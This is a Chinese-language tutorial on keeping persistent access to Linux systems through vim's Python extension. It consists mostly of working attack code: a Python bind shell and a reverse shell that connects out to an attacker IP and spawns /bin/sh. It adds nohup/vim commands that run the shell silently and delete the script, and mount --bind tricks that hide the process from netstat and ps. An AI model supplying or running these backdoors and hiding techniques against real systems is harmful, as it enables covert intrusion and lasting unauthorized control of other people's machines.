Linux权限维持之vim python 扩展后门(五)
适用于安装了vim且安装了python扩展(绝大版本默认安装)的linux系统。
cd /usr/lib/python2.7/site-packages && $(nohup vim -E -c "pyfile dir.py">
/dev/null 2>&1 &) && sleep 2 && rm -f dir.py
$(nohup vim -E -c "py3file dir.py"> /dev/null 2>&1 &) && sleep 2 && rm -f dir.py
恶意脚本 1.py的内容可以是任何功能的后门,比如监听本地的11端口: 正向后门
我们可以多了解看一篇文章
https://www.leavesongs.com/PYTHON/python-shell-backdoor.html
from socket import *
import subprocess
import os, threading, sys, time
if __name__ == "__main__":
server=socket(AF_INET,SOCK_STREAM)
server.bind(('0.0.0.0',5555))
server.listen(5)
print ('waiting for connect')
talk, addr = server.accept()
print ('connect from',addr)
proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk, stdout=talk,
stderr=talk, shell=True)
我们新建目录 新建文件
反向后门
import socket, subprocess, os;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("192.168.241.128", 6666));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
p = subprocess.call(["/bin/sh", "-i"]);
隐藏后门
(nohup vim -E -c "py3file shell.py"> /dev/null 2>&1 &)
#将nohup的执行结果输出到/dev/null中
#其中/dev/null在linux中代表空设备,结果输出到空设备也就是丢弃nohup的执行结果。 #“2”在linux中代表错误输出,“1”在linux中代表标准输出,在此处也就是nohup的输出。2>&1表示将错误 输出绑定到标准输出上,在此处也就是将错误输出同样输出到空设备上不进行显示。这样,无论nohup执行结 果是否正确,都不会有输出。
将netstat -antp 查看到的可疑连接隐藏起来,解决方法:
既然是后门,那么就不能留下自己创建的文件,可以将删除命令直接拼接到命令上
(nohup vim -E -c "py3file 1.py"> /dev/null 2>&1 &) && sleep 2 && rm -f 1.py
我们打开 Kail 进行监听
但是 这里能看到我们们的进程
隐藏进程
mkdir null
mount --bind null /proc/6238
netstat -anpt
#mount--bind命令是将前一个目录挂载到后一个目录上,所有对后一个目录的访问其实都是对前一个目录的访问,并且会将前一个目录路径隐藏起来(注意这里只是隐藏不是删除,数据未发生改变,仅仅 是无法访问了)。
攻击机nc连接过去就可以了:
nohup vim -E -c "pyfile dir.py" nc 127.0.0.1 11
查看 cat /proc/$$/mountinfo 可以看到挂在的目录
sudo umount /proc/2607 sudo netstat -anpt
ps aux | grep 2607
总体步骤
刚开始
然后我们隐藏进程
然后输入
mkdir null
mount --bind null /proc/3362
netstat -anpt
发现已经被隐藏
然后我们
查看 cat /proc/$$/mountinfo 可以看到挂在的目录
然后取消挂载
sudo umount /proc/3362
查看进程
sudo netstat -anpt
ps aux | grep 2607
查看挂载目录
然后我们取消挂载 发现又回来了
然后我们在挂载
mount --bind null /proc/3362
现在又看不到了
然后我们进行监听
